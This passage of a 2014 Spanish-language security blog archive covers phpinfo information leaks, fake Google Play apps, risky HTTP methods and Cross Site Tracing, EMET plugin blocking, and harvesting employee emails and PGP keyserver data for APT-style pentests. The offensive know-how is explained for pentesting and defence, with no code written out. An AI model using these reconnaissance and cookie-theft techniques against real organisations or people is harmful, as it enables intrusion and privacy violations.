herramientas de diagnóstico de vulnerabilidades. Algunas de estas bases de datos que colaboran con la difusión de la información relacionada con las vulnerabilidades son OSVDB, NVD o CVE Details. Por tanto, la difusión de la información con estándares de este tipo garantiza una homogeneidad en los datos mostrados sin importar la fuente y disponer de fuentes tan completas como sea posible. Las listas de CVEs correspondientes a cada año se pueden descargar en este formato desde la web de oficial de CVE. En su contenido puede verse la estructura de este lenguaje basado en XML donde cada CVE contiene una serie de propiedades y cada una de ellas contiene la información correspondiente a la vulnerabilidad. Lista CVRF del año 2012 * Ocho siglas relacionadas con las vulnerabilidades (I): CVE * Ocho siglas relacionadas con las vulnerabilidades (II): CWE y CAPEC * Ocho siglas relacionadas con las vulnerabilidades (III): CVSS * Ocho siglas relacionadas con las vulnerabilidades (IV): CWSS * Ocho siglas relacionadas con las vulnerabilidades (VI): CWRAF Umberto Schiavo umberto.schiavo@11paths.com
27 de junio de 2014
Errores de configuración y malas prácticas: PHP Info
Cada día se configuran cientos de servicios, se actualizan y quedan expuestos a olvidos y fallos de configuración. La tecnología PHP se encuentra muy distribuida en Internet y la configuración de manera desatendida o por defecto puede provocar que se exponga más información de la se desea. En esta entrada nos centramos en las características de la función de " phpinfo" y cómo aprovecharlas para obtener el máximo beneficio. Con simples búsquedas en Google y mediante parámetros avanzados se podrían encontrar gran cantidad de archivos del tipo phpinfo.php. En la imagen se puede observar cómo quedan al alcance de la mano alrededor de 22.500 resultados. Muchos de ellos serán archivos de este tipo. Archivos phpinfo disponibles públicamente ¿Por qué estos resultados son importantes en un pentesting? La primera fase del pentest es el descubrimiento o "discovery". Es importante conocer el objetivo marcado todo lo que se pueda. Internet es un lugar donde buena parte de lo que se haga, condiv y publique queda expuesto y por esta razón, recopilar y conocer todos los detalles de lo que dispone una organización es fundamental para progresar en el pentest. ¿Es posible obtener información jugosa? La cierto es que sí. A continuación vamos a enumerar los elementos de interés que es posible obtener de estos archivos: Usuarios del sistema. Rutas internas que ayuden a conocer cómo se estructura el sistema de archivos y qué aplicaciones se ejecutan. Siguiendo un ejemplo real sobre el que se han realizado pruebas, en el caso del servidor de correo si se analiza la directiva sendmail_path es posible deducir que se realiza a través de la ruta C:xamppmailtodiskmailtodisk.exe. Las rutas internas provocan fugas de información que puede ayudar al pentester a modelar su siguiente paso. Direcciones de correo. Este documento puede aportar información sobre correos. Evidentemente no es la mejor vía en un pentesting para encontrar correos electrónicos pues para ello tenemos otras vías como son las de The harvester, Maltego o el propio Faast, pero sí puede resultar complementaria. Módulos habilitados que posibiliten otros ataques. Esto es una característica que un pentester debe observar a conciencia. Este tipo de descubrimientos puede hacer que un pequeño descuido en la configuración de un servidor acabe convirtiéndose en el punto de inflexión por el que se accedió a datos relevantes de la organización. El sistema operativo y versión que corre la máquina. Esto es importante para saber rápidamente si existen vulnerabilidades que puedan comprometer la seguridad del servidor. Versiones de aplicaciones y servicios. La información que se puede obtener con este archivo es importante. Por ejemplo en las siguientes imágenes podemos comprobar que existe un MySQL en el puerto 3306 (detalle que se puede conocer también con un nmap sin demasiado esfuerzo); que la versión de OpenSSL es posible que sea vulnerable a HeartBleed (CVE-2014-0160); o que la versión de Python es la 2.7. Ejemplo de información extraíble en un archivo phpinfo En el caso de las directivas comentadas anteriormente, se puede concluir también que, por ejemplo, si safe_mode está deshabilitado podría llegarse a la ejecución de comandos desde un archivo php. Por otro lado la directiva display_errors en modo "on" significa que los mensajes de error de php se volcarían para cualquier usuario, por lo que el pentester puede así provocar fallos en busca de "leaks". Existen diversas directivas que, por ejemplo, son analizadas por Faast en busca de estos fallos, una vez descubierto un archivo PHP info. Un pequeño error en la configuración puede abrir cientos de puertas o vectores de ataque a un pentester. Utilizando el servicio Faast y haciendo pruebas sobre nuestro sitio de pruebas demofaast se obtuvo la siguiente evidencia: Ejemplo de conversación HTTP Se puede ver una petición al servidor, una respuesta y parte del contenido que es la evidencia de que se está ante un PHP Info que provocará la fuga de información. Además, la herramienta se nutre de toda la información para seguir explorando las posibilidades que este tipo de fuga ha provocado. Como curiosidad, recordar que Faast, además de detectar este archivo y "destriparlo" para avanzar en la investigación, permite alertar sobre cualquier otro fichero sospechoso que pueda suponer un peligro para el servidor, como pueden ser la mayoría de shells documentadas que, por sus características, resultan identificables. Pablo González pablo.gonzalez@11paths.com
25 de junio de 2014
El negocio de las "FakeApps" y el malware en Google Play (IX): ¿Qué hacen y cómo se programan las apps?
Durante este estudio de las apps falsas que simulan ser otras más populares, hemos hablado de varios aspectos relativos a este negocio. Sin embargo, ¿ qué ocurre exactamente cuando un usuario se instala una de estas apps? ¿Cómo crean tantas y tan rápido los atacantes? Veamos qué hacen y cómo lo hacen. Las apps falsas "puras", que simulan ser algún otro juego popular, suelen pesar poco (entre 200 y 500 kbs) y estar destinadas directamente a la publicidad invasiva. Pueden realizar varias funciones en el dispositivo de su "víctima", entre otras: Como se ha mencionado, y la razón de todo esto, es bombardear al usuario con ventanas emergentes, banners y todo tipo de publicidad, hasta el punto de que (si los programas se inician con el teléfono) sea complicado utilizar el dispositivo. Ejemplo de publicidad superpuesta a cualquier otra app Obligar al usuario a valorar otras aplicaciones (normalmente también falsas) con 5 estrellas. Así consiguen dar veracidad a otras apps que han subido previamente, y pueden mejorar su ingeniería social. Normalmente avisan que hasta que no se vote, no se puede jugar. Este es el modelo clásico y permite posicionar bien la app en el market, al tiempo que "invalida" en cierta forma este método de reputación. Ejemplo de Minecraft falso que solo busca que se le puntúe con 5 estrellas y mostrar publicidad Obligar al usuario a descargar otras aplicaciones falsas o modificadas. También aumenta así el número de descargas. Igualmente, esto hace que el usuario que confíe en el número de descargas como parámetro de la popularidad o fiabilidad de un programa, pueda equivocar su evaluación. Como regla general, hay que tener en cuenta que el número de descargas no significa nada en números relativamente pequeños. Ejemplo típico de app que instala markets alternativos, y busca una descarga y una puntuación Modificar el market o instalar nuevos markets. Las búsquedas de apps se realizan así sobre otro servidor de descarga, donde no se ejerce ningún control de la calidad de las apps. Ejemplo de anuncio de market alternativo ¿Pero las apps falsas contienen juegos o no? Muchos no son más que el adware o malware en sí, pero otros sí que contienen alguna función. Durante 2012 y 2013, sí fue muy habitual el "reempaquetamiento" de apps y juegos a los que se añadía "funcionalidades extra". Sin embargo esto ya no es tan habitual debido a los controles actuales de Google Play. Pero no por eso existen "FakeApps" que no contengan funcionalidad. Aunque esto emparenta con actividades completamente legítimas, también lo aprovechan los creadores de adware y malware en Google Play. Son las llamadas "plantillas" para juegos y utilidades, que se comercializan y subastan. Han favorecido la aparición de empresas que gestionan este intercambio y que permiten que, sin saber programar una sola línea, sea posible crear apps populares (incluso para otras plataformas diferentes a Android). Empresas como Binpress, Apptopia, Chupamobile, CodeCanyon o españolas como Mobincube ofrecen maneras de crear y personalizar apps con solo pulsar algunos botones. Las "plantillas" proporcionan la funcionalidad básica. Por ejemplo, del juego de moda del momento. Son compañías y actividades completamente legítimas, pero cuyos servicios son aprovechados por atacantes. La razón es que en realidad, en el mundo móvil los juegos o apps de moda suelen ser muy parecidas en su funcionalidad. Lo único que suele cambiar es el diseño. Por tanto, los "motores" (puzles, fondos de pantalla, plataformas, cortadores de fruta, estilo flappy birds...) pueden reutilizarse. Se añaden algunos gráficos propios, y ya se dispone de un juego que se puede monetizar partiendo de una mínima inversión en dinero y tiempo. También ocurre con pequeñas funcionalidades como linternas, bromas, frases... que tanto abundan en Google Play. Venta legítima de plantillas para aplicaciones para Android Algunas de estas compañías, dejan preparada la app para introducir la publicidad configurada directamente y así generar beneficio al autor. De esta forma, el programador (o atacante, en el caso de que introduzca adware demasiado agresivo o malware) solo debe entender la "tendencia" de descarga del momento que existe en Google Play, que fundamentalmente se basa en: Conocer los juegos o funcionalidades de moda, que suele coincidir con las palabras clave que le proporcionarán descargas. Estar al tanto de apps muy codiciadas que vayan a aparecer de manera inminente en Google Play, y simular que se trata de esa app para cazar a los usuarios que la buscan activamente incluso cuando no se encuentra oficialmente disponible para esa plataforma. Empresa de creación de apps de forma sencilla Con esta información, el creador de adware solo tendrá que adquirir la plantilla correspondiente, incrustar su publicidad, y subirla a Google Play. Normalmente Google Play lo retirará después de algunos días (o no), pero lo más probable es que el negocio le sea rentable durante el tiempo que se mantenga online. * El negocio de las "FakeApps" y el malware en Google Play (I): Introducción * El negocio de las "FakeApps" y el malware en Google Play (II): Tipos de "fakes" * El negocio de las "FakeApps" y el malware en Google Play (III): Estrategias * El negocio de las "FakeApps" y el malware en Google Play (IV): Política y rentabilidad * El negocio de las "FakeApps" y el malware en Google Play (V): Limpieza automática * El negocio de las "FakeApps" y el malware en Google Play (VI): Limpieza "manual" * El negocio de las "FakeApps" y el malware en Google Play (VII): Cómo llegan a las víctimas * El negocio de las "FakeApps" y el malware en Google Play (VIII): Permisos en las apps Sergio de los Santos ssantos@11paths.com @ssantosv
23 de junio de 2014
La seguridad en los métodos HTTP
Según describe el estándar HTTP 1.1, existen 28 métodos (o verbos) para la comunicación mediante el protocolo HTTP. Aunque muchos son desconocidos para la mayoría de usuarios (y administradores de sistemas) por no ser de uso habitual, existe un riesgo potencial si el administrador del servidor web no los tiene controlados. Veamos algunas técnicas comunes. Entre los métodos más comunes, definidos en el RFC 2616, se encuentran: GET: El método más común en la navegación web. Devuelve un código de respuesta y las cabeceras asociadas. Incluye el documento solicitado (habitualmente una página) en el cuerpo del mensaje. HEAD: Idéntico al anterior, con la salvedad de que no devuelve el documento en el cuerpo de la respuesta. Se utiliza para extraer información sobre el documento solicitado o comprobar si existe sin necesidad de enviar y recibir el documento como tal. POST: Pensado para publicar la información contenida en el cuerpo de la petición en el recurso donde se envía esa petición. La información que se publica y la forma de hacerlo depende completamente del servidor y el recurso. Hoy, el uso que se le da a este método es el de paso de parámetros de cliente a servidor (en muchas ocasiones para ficheros). La respuesta por parte del servidor es la misma que para una petición GET. TRACE: Implementa la función de eco para los mensajes HTTP. El servidor responde en el cuerpo del mensaje con la misma petición que el cliente ha realizado. Se utiliza para comprobar que las peticiones son recibidas correctamente. Su finalidad es la de depuración. OPTIONS: Este método presenta las opciones que el recurso o servidor dispone o requiere. De esto se puede obtener información como por ejemplo los métodos permitidos (en la cabecera ALLOW). CONNECT: Utilizado para crear la comunicación con un proxy HTTP (SSL). PUT: Mediante este método es posible almacenar el documento que se envía como cuerpo de la petición en el propio servidor (físicamente en disco). Si el recurso al que se hace referencia en la petición no existe se creará y si existe se sobrescribirá. DELETE: Al igual que el método PUT, este verbo afecta directamente al recurso al que se hace la petición. Tiene la capacidad de eliminar el elemento y dejar al servidor sin ese recurso. El resto de verbos (menos usados) son PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK ( RFC 2518), VERSION-CONTROL, REPORT, CHECKOUT, CHECKIN, UNCHECKOUT, MKWORKSPACE, UPDATE, LABEL, MERGE, BASELINE-CONTROL, MKACTIVITY (RFC 3253), ORDERPATCH ( RFC 3648) y ACL ( RFC 3744). PUT y DELETE A primera vista, dos de estos métodos pueden resultar críticos en el entorno web donde se encuentren habilitados. Tanto PUT como DELETE permiten interactuar directamente con recursos legítimos del sistema. El primero para crearlos (por ejemplo una web shell para controlar el servidor, o fichero modificado para conseguir desfigurar alguna web legítima) y el segundo para eliminar archivos o activos de, por ejemplo, una compañía. Encontrarse este tipo de configuración en servidores en producción no es demasiado común, pero aun hoy no es extraño localizarlos. Para demostrarlo, basta con hacer consultas avanzadas sobre los motores de búsqueda, o basarse en las respuestas a las peticiones OPTIONS. Ejemplo de petición y respuesta OPTIONS usando el complemento RestClient de Firefox Este método devuelve información del servidor, pero esta información no tiene que ser ni completa, ni veraz. En ocasiones se mostrará una cabecera ALLOW con métodos HTTP permitidos, lo que no quiere decir que estos métodos estén implementados. Es decir, a pesar de que el verbo OPTIONS indique que se admite un método concreto, al utilizar este método es muy posible que retorne un código de error, ya sea de no implementado (501), no encontrado (404), etcétera. Ejemplo de volcado del paquete de petición y respuesta con verbo OPTIONS Y en otras ocasiones ocurrirá lo contrario, la cabecera ALLOW de la petición OPTIONS no mostrará métodos que realmente están permitidos e implementados... aunque luego es posible su ejecución. En resumen, no se deben descartar los métodos que no estén reflejados en esa cabecera. TRACE y ataques XST Además de PUT y DELETE (peligrosos si no se tienen completamente controlados) no hay que olvidar el método TRACE, en principio "inofensivo". Ejemplo de volcado del paquete de envío y respuesta con verbo TRACE Como ya se observa en la imagen, este método devuelve como cuerpo las cabeceras de la petición del cliente, incluyendo la cabecera Cookie que (según entornos) puede resultar crítica si existe una sesión establecida con el servidor. La combinación de este verbo HTTP con un fallo "Cross Site Scripting" en la aplicación web puede acabar en un robo de sesión de usuario, incluso si las Cookies han sido establecidas como HttpOnly. Este ataque es conocido como "Cross Site Tracing" o XST. El ataque consiste en, cuando se inyecta código JavaScript explotando la vulnerabilidad XSS, realizar una petición con el método TRACE al propio servidor y enviar el cuerpo de esta respuesta al propio atacante por la vía que sea más cómoda. El contenido devuelto incluirá la cabecera Cookie con sus valores, tenga el flag que tenga. Un ejemplo de código JavaScript que es posible inyectar se muestra en la imagen siguiente, aunque en vez de enviar la respuesta a un servidor propiedad del atacante, se muestra en un mensaje "alert" como prueba de concepto. Ejemplo de código JavaScript para inyectar y explotar un fallo XST Aunque lo cierto es que hoy los navegadores más modernos ya bloquean este tipo de peticiones para evitar específicamente este ataque. Pero tampoco hay que olvidar que existen otras alternativas a JavaScript para realizar peticiones TRACE como Flash, Applets Java, etcétera. Con ellos se puede llegar a conseguir el mismo resultado eludiendo los bloqueos del navegador. Desde el punto de vista del servidor, la manera obvia de evitar estos problemas es, cómo no, reducir la superficie de ataque deshabilitando aquellos métodos que no sean útiles para el entorno concreto, y controlar exhaustivamente los que sí se estén utilizando. Faast, el servicio de pentesting persistente, monitoriza este tipo de configuraciones en los servidores web y analiza cualquier método HTTP inseguro que pueda estar habilitado o implementado. Ioseba Palop ioseba.palop@11paths.com
18 de junio de 2014
Para qué sirve el Attack Surface Reduction en EMET
Durante 2013, fue necesario "detener" la locura de exploits y problemas de seguridad que aparecían en el plugin Java que utilizan la mayoría de los navegadores. Casi todos acabaron desactivándolo por defecto. Pero Java no es el único culpable de las vulnerabilidades a través del navegador. EMET incorpora ahora una interesante funcionalidad llamada Attack Surface Reduction (ASR) que puede suponer una importante mejora para la seguridad de, no solo Internet Explorer en particular, sino de cualquier programa en general. El origen de la idea Hoy por hoy, el problema con los exploits no se encuentra tanto en los navegadores como en los plugins que utilizan. Suelen ser los culpables de los graves problemas de ejecución de código arbitrario con solo visitar una web. Es cierto que cada cierto tiempo, se encuentran nuevas vulnerabilidades que permiten ejecutar código en el sistema por culpa del navegador en sí, pero incluso para llegar a esta fase, deben eludir ciertas medidas de seguridad. Y para eludirlas se apoyan en los plugins. Por ejemplo, para conseguir eludir ASLR es común utilizar librerías de plugins comunes (Flash, por ejemplo) para "orientarse" en memoria y ejecutar un exploit de forma eficaz en el sistema. O a veces, ocurre que se actualiza el navegador, pero no los plugins asociados. La exposición del usuario sigue existiendo entonces. Pero, por mucho que se aconseje su desactivación, no se puede pretender vivir sin algunos plugins. Las páginas legítimas los necesitan. Así que es necesario utilizar herramientas que permitan crear listas blancas o negras. Y ni aun así se estaría bien protegido. Algún atacante podría perpetrar ataques de tipo watering hole, esperando intentar explotar una vulnerabilidad en una web de uso habitual pero comprometida. ¿Pero no se podía ya evitar los plugins desde las zonas de internet Explorer? No era fácil. En varias ocasiones se demostró que las opciones que parecían lógicas para evitar la ejecución de Java en el navegador, no conseguían de verdad deshabilitarlo en todas las circunstancias. También estaban los kill bits... pero eran difíciles de activar, y no dejaban de estar pensados como sistemas de mitigación. Aunque en los últimos tiempos, muchas de las actualizaciones de seguridad de Microsoft se dedicaban activamente a activar los kill bits de plugins para el navegador permanentemente. Sentadas estas bases, aparece Attack Surface Reduction en EMET para intentar evitar que cualquier programa sea capaz de cargar cualquier plugin, desde sus fundamentos: impidiendo las llamadas a librerías DLL. EMET al rescate Attack Surface Reduction es una nueva funcionalidad de EMET, introducida en su versión 5. Si EMET comenzó como un proyecto para detener los "trucos" usados por atacantes para hacer que funcionasen los exploits, (bloquear los intentos de eludir DEP, ASLR, y otros métodos comunes de explotación) desde hace algún tiempo ha crecido en funcionalidad y potencia: Ya es también una herramienta de certificate pinning para Internet Explorer Es además un sistema de bloqueo selectivo de plugins y DLLs para programas... aunque todavía le queda mucho que mejorar, esto es el ASR. Cómo funciona Visualmente, se debe marcar la opción en el panel de EMET para un programa concreto. Hay que pensar en ASR como un sistema que impide que un proceso cargue ciertas DLL, OCX o cualquier complemento, lo que pueda dar más juego del que en principio se piensa. En esta pantalla se le indica a EMET que vigile un proceso con ASR Luego será necesario ir al registro, y configurar a mano los módulos que se quieren bloquear. La organización habitual de EMET consiste en asignar un CLSID aleatorio a una aplicación. Dentro de ella, la rama contendrá la configuración específica. Se encuentra en HKEY_LOCAL_MACHINESOFTWAREMicrosoftEMET_settings_. Ahí se creará una rama con el nombre del programa y su CLSID. Más arriba (por encontrarse en orden alfabético) se podrá comprobar que existe otra rama con ese mismo CLSID y la configuración correspondiente al programa en su interior. Por ejemplo la de Internet Explorer será: Configuración interna de ASR para Internet Explorer en EMET Ahí se encuentran la cadena "ASR" (con valor 1 si se ha activado en el panel gráfico de EMET) y "asr_modules". Esta puede contener, separados por ";", los módulos que no se quieren cargar cuando se ejecute el programa. EMET ya viene configurado de forma predeterminada con la opción de impedir que Internet Explorer cargue npjpi*.dll, jp2iexp.dll, vgx.dll y flash*.ocx. Pero solo en las zonas 1, y 2, que se corresponden con Local (0), Intranet (1), Sitios de confianza (2), Internet (3), Sitios no confiables (4). O sea, el valor "asr_modules" mantiene una lista de librerías que están prohibidas para ese proceso, mientras que para Internet Explorer, existe el valor "asr_zones" que marca las excepciones según las zonas. Es mejor ver la imagen para entenderlo. Las librerías prohibidas de forma predeterminada son: npjpi*.dll y jp2iexp.dll: Relacionadas con Java. vgx.dll: El procesador de gráficos de vectores VML flash*.ocx: Flash. Así, la configuración por defecto permitiría estas tres tecnologías en las zonas de confianza e internet y las bloquearía en el resto. Sería posible eliminar o añadir tecnologías bloqueadas y hacerlo más granular añadiendo dominios a las zonas tradicionales. Para Office (o cualquier otro programa), es más sencillo aún, porque no se ofrece el concepto de zonas de bloqueo ("asr_zones"). Así, por ejemplo solo se indica que a Word se le prohíbe cargar Flash en su interior (con "asr_modules"). Esta es la configuración por defecto: Configuración interna de ASR para Word en EMET Cuando el navegador intente activar una web con un plugin (Flash en el ejemplo) que cae sobre la zona correspondiente y bloqueada, aparecerá un mensaje de este tipo en EMET. Pero esto puede llevarse a cabo con cualquier programa. Lo que abre la posibilidad de bloquear selectivamente la carga de DLLs en cualquier proceso. Sergio de los Santos ssantos@11paths.com @ssantosv
16 de junio de 2014
Orientando el pentesting hacia un ataque APT: Correos electrónicos
La seguridad de las empresas depende de muchos factores y ya se sabe que el eslabón más débil suele ser no tanto el servidor como el usuario. Con este enfoque, el pentesting debería evolucionar y llegar a combinar el proceso de intrusión "habitual" con la información recopilada sobre los usuarios. ¿Por qué no añadir a un proceso de hacking ético pruebas que simularían un ataque del tipo APT, (Advanced Persistent Threat) contra el objetivo con la idea de retroalimentar las dos vertientes del proceso? El resultado podría ser mucho más provechoso. Un test de intrusión "tradicional", ofrece la posibilidad de realizar ataques controlados a sistemas expuestos, pero lo cierto es que si un atacante real quiere vulnerar una organización, quizá el camino más corto consista en el ataque a los empleados. Y para que este camino más corto sea aún más efectivo, debe recopilar información sobre ellos, obteniendo una visión global que aumente las posibilidades de éxito. Así, el concepto de pentest se expande, ya no solo a todo lo que se exponga en la red, sino además a la necesidad de concienciar y poner controles para que los datos "filtrados" sobre empleados no estropeen la inversión en seguridad. Cuando en un proceso de hacking ético se han realizado pruebas de pentesting externo a la organización, los resultados han podido ser utilizados para pruebas de APT o ingeniería social y viceversa. En realidad, ambos procesos se encuentran unidos de alguna manera y no deberían ser tomados como independientes. Un atacante no lo hará en el mundo real. Un APT es un concepto complejo que puede que se haya desvirtuado, pero en general, es un conjunto de ataques informáticos que suceden de una manera continua sobre una persona o un conjunto de personas de interés. El fin es conseguir la información de valor de las que esta persona o conjunto de personas disponen por sí mismas o en su entorno. Existen tres vertientes en un APT: Es un proceso avanzado. Aunque no siempre se utilizan técnicas avanzadas para lograr los objetivos, en muchas ocasiones se necesitan varios desencadenantes o condiciones para que el ataque tenga éxito. Es un proceso persistente. Se hace un seguimiento del objetivo, intentando monitorizar acciones, clasificar comportamientos en el mundo digital, incluso fuera de él, y realizando un profiling de la persona. Es un proceso basado en las amenazas del mundo digital. Un usuario está expuesto a más amenazas cada día y los empleados de una organización no son una excepción. Atendiendo a esta definición, el resultado de un pentesting podría considerarse como una entrada muy útil para un proceso de ataque tipo APT: metadatos, tipos de software que se utiliza en una organización, correos electrónicos de usuarios, correos electrónicos personales, direcciones IP, números de teléfono, etcétera... Por sí solos pueden no suponer un gran descubrimiento para el informe de un test de intrusión, pero es información valiosa para potenciar un APT. Ejemplos del mundo real En un pentest clásico, es habitual conseguir cuentas de correo para aplicar fuerza bruta o ataques de diccionario contra un servicio. Esta prueba suele hacerse usando un diccionario de contraseñas no seguras, para asegurar que no se protegen las cuentas con contraseñas débiles. Para conseguir correos electrónicos en Internet se pueden utilizar diversos medios: el primero son buscadores como Google, Bing o Exalead. Para facilitar la tarea existen varias herramientas como TheHarvester o Maltego. Ejemplo de salida de TheHarvester Aunque en la imagen no se pueda visualizar se han obtenido más de 30 resultados. Esta puede ser una buena manera de comenzar con la recolección de cuentas de usuario. Pero es que, además, esta es información muy valiosa para un profiling de empresa orientándolo a un ataque del tipo APT. Otra de las vías para la recolección de correos electrónicos y cuentas de usuario es la búsqueda a través de los servidores de claves PGP. Esta plataforma proporciona mucha información interesante para poder utilizar y personalizar a los usuarios. Por ejemplo, realizando una simple búsqueda por dominio se obtiene lo siguiente: Ejemplo de información sobre claves PGP Donde se concluyen varios datos interesantes: El usuario y el correo electrónico. El nombre completo de la persona. En este caso, el nombre será real la mayoría de las veces, puesto que un usuario configura su clave pública con su nombre verdadero para que pueda ser encontrado en estos servidores. Puesto de trabajo en la organización. Algunos usuarios así lo hacen. Correo alternativo. En algunas ocasiones los usuarios utilizan la misma clave PGP para varios correos, por lo que será posible encontrar cuentas genéricas de Gmail, Hotmail, o el ISP contratado. Esto permitirá relacionar a una persona entre su correo profesional y su correo personal. De ahí se puede saltar hacia las redes sociales y otros entornos de interés. Si se elige una búsqueda avanzada en un servidor de claves, es posible extraer más información aun. Por ejemplo, obtener información sobre si la clave está revocada o si la confirman otros usuarios. Este es un punto interesante: conocer con quién se relaciona una persona es importante puesto que, para la preparación de un ataque más sofisticado del tipo APT, permite disponer de diferentes caminos alternativos para poder llegar al objetivo final. Ejemplo de "círculo de confianza" en claves PGP En Eleven Paths estamos realizando un plugin para obtener este tipo de información en nuestra herramienta de pentesting persistente Faast. El objetivo es que nuestra visión global de la seguridad de una organización no se quede simplemente en el estado de los servicios expuestos, malas configuraciones, vulnerabilidades en aplicaciones, etcétera. Nuestra idea es ofrecer un informe de todo lo que puede afectar a una organización además de los elementos que un atacante pueda utilizar para dañar la imagen de una empresa. El ejemplo expuesto, centrado en el correo electrónico, es una muestra de cómo ampliar el campo de acción de un pentest y enriquecerlo con datos personales "descuidados" en la red. Plugin de Faast En la imagen se puede visualizar un ejemplo de salida de nuestro plugin en desarrollo. Nuestro sistema Faast pronto proporcionará esta información, pero lo más importante es que Faast es capaz de brindar más información utilizable en estos procesos. En las pruebas que vamos realizando en entornos controlados se encuentran nombres de personas, DNI, usuarios, software asociados a máquinas de ciertos usuarios, sistemas operativos, etcétera. Esta información resulta muy valiosa como punto de partida para un ataque de tipo un APT. Pablo González pablo.gonzalez@11paths.com
11 de junio de 2014
The weakest hand (on security)
Users have much more at stake in the digital world than ever before. Arguably as much or more, even, than our employers: our personal and professional reputations, livelihood, assets, family, friendships and homes. Yet, most of us use little more than an antivirus, desktop firewall, and whatever has been built into our routers and implemented for us by our local ISPs to safeguard all of this. Meanwhile, the businesses we work for have hired experts to monitor the organization, its systems, applications, and devices around the clock. They invest in layered defenses, analytics, forensics, intelligence and so forth. But, they do little to protect users when we leave the office. The weakest link Finding Nemo. Source: imdb.com Whether or not they realize it, organizations depend on us, also around the clock, to defend both personal and enterprise interests. Attackers can leverage vulnerabilities in our personal digital lives to get at our employers, and vice versa; and often, this is precisely what they do. Users are an easy mark. We are the weakest link, "the fish" as they say at the poker table susceptible to phishing, watering hole, and social engineering. We are error prone, willing to sacrifice security for productivity gains, often lazy, or resistant to security policy. To make matters worse, when we leave the office we haven’t got the resources our employers have; and so, we don’t take the precautions that might otherwise help our organizations minimize the risks associated with attacker-leap-frogging from the personal to the professional. Just as with businesses, the overall level of risk to which we, the fish, are exposed is increasing, and we ought to dedicate more care and awareness to safeguard our personal digital lives, the same way our employers do to protect their assets. But, we don’t (at least not the majority of us) and so long as we don’t do enough to protect ourselves we will continue to be fish. Long live the antivirus? There´s a paternalistic aspect to securing users and consumers that, though well intentioned, may ultimately have caused this problem. I am referring to the very global security policies and measures to which our organizations subject us. Take the antivirus as an example. The antivirus is practically ubiquitous in desktop systems of all large and medium enterprises, and its presence is enforced; sometimes even on visitors and contractors, through policy, and complex and expensive network admission control systems. Enterprises have been singing the praises of antivirus in this way, both explicitly and implicitly, even when "fake-av" aka "rogue antivirus" came along in 2008 to sound the death knell on the venerated, but tired bluff of recursive decompression, signatures, heuristics, and so forth. Virustotal statistics Enterprises and households could have saved themselves numerous headaches, by focusing their time and budgets on alternatives to the antivirus, years ago. At least since 2007, when studies began to demonstrate that the trusted software was only effective 20-30% of the time. Instead, we all soldiered on, long after the tool was rendered more or less useless. It survived, thanks in no small part to organizations that insisted on playing this losing game, throwing good money after bad on a losing hand. The thing is, antiviruses have become largely irrelevant to attackers, who now avail themselves of novel vectors of entry inaugurated by the mobile-cloud-social era in which we all live. But, let’s set aside the irrelevance of antiviruses, and their technical limitations. (Antivirus technology has always imposed significant system performance issues, the risk of false positives, and even an additional attack target due to its kernel level access). Their ineffectiveness is not just limited to the underlying technology, but also due to the lack of user involvement and understanding. How many users know, or even bother to tune the software to their system? How many are aware that it does not adequately address zero day threats, or most malware on websites, phishing, advanced malware and Trojans, and so on? Is it any wonder that users continue to download free and purchased antivirus software? Is it any wonder they think themselves secure once it’s installed? Recently, Symantec officially proclaimed the death of the antivirus through a Wall Street Journal interview. For large manufacturers antiviruses continue to generate a lot of revenue, but the business proposition is no longer acceptable. It is a saturated market, in which top firms compete against cost free alternatives, including Windows Essentials, fight to displace competitors for miniscule changes in enterprise B2B market share, and depend largely on renewals. For such companies the shift to a replacement technology could not have come soon enough. Enter sandboxing and automated malware analysis engines, which overcome many of the shortcomings of the antivirus, including performance and detection of advanced threats. Involve the user What such technology does not address, however, is the fundamental need to involve the user in securing their digital identity. Sandboxing may be a solid step forward in detection. But, it is also a toolset which promotes continued reliance on a hackneyed, cat-and-mouse updating model. Similar to antivirus technology, this new technical approach to defeating malware lulls users into the belief that they are supremely protected, even against zero day threats. Sandboxing combined with malware analysis may be big business. However, it may also be, that security technologies which do not engage and motivate users to take an active role in their own defense are of limited benefit. Excessive attention focused on new, advanced detection and mitigation technologies will likely result in the same blowback of unprepared, ignorant, and vulnerable user populations, as traditional antivirus. We are still the "weakest link". Sandboxing doesn’t change that. But, times have changed; and like the skin of an expanding balloon our vulnerabilities are spreading out across an ever-widening attack surface: mobile, cloud and social. Systems, applications, and users are becoming increasingly difficult to secure; and global security policies and measures imposed across these surfaces are stretched thin. Perhaps it is not the technology, but our focus which must shift, from global policies, toolsets, and procedures, to one that leverages the user’s help. After all, we bring our own advanced, mobile computing devices to work; we subscribe to cloud based storage systems, and upload and share company documents; we use professional and personal social networks, and leverage them to the benefit of ourselves and our employers, spin up new systems and servers, for trials, training and our own curiosity. It doesn’t require much imagination to see how our public and private lives have never been so intricately interwoven. Data Leakage Worldwide: Common Risks and Mistakes Employees Make: Shows the frequency with which corporate computers are used for personal use Source: http://www.cisco.com/c/en/us/solutions/collateral/enterprise-networks/data-loss-prevention/white_paper_c11-499060.html A quick review of some statistics show this intermingling is likely to deepen, that there are business incentives for it to happen, as well as significant business risks. According to Citrix, organizations predict that the percentage of BYO desktops and laptops will grow from 18-25%; Gartner says that by 2017, 50% of businesses will not supply employee computing devices; Deloitte adds that 69% of polled companies experience no technical support problems after implementing BYOD; despite the finding by Acronis that 80% of businesses do not provide education or training on BYOD. In a 2012 survey, commissioned by Check Point, of 768 IT professionals in the US, Canada, UK, Germany and Japan 78% said there were more than twice as many personal devices connecting to corporate networks than there were two years before; and 47% reported that customer data was stored on mobile devices; 90% of which, according to Forbes, are used for email, calendar, shopping, banking and social. Source: http://dreamscashtrue.com The new digital polis involves a fusion of the private with the public, the personal with the professional, and requires organizations to change their perspective on securing systems, applications, users and other assets. This new view opens unprecedented opportunities to engage with us users (whether we are employees, partners or consumers). Organizations can become protagonists in our active involvement both within and without the workplace to secure ourselves, and thereby protect the enterprise. Currently, few security solutions help in this way. Most strive to do precisely the opposite: to minimize users’ roles in the security process. Rather than encouraging us to secure ourselves, these solutions lead us into taking foolish risks, shortcuts, and workarounds, making erroneous judgments and mistakes. In sum, we end up behaving like the weakest player at the poker table, the mark for all of our adversaries, the fish who, no matter what, always has the weakest hand. Christopher Adelman christopher.adelman@11paths.com
10 de junio de 2014
El negocio de las "FakeApps" y el malware en Google Play (VIII): Permisos en las apps
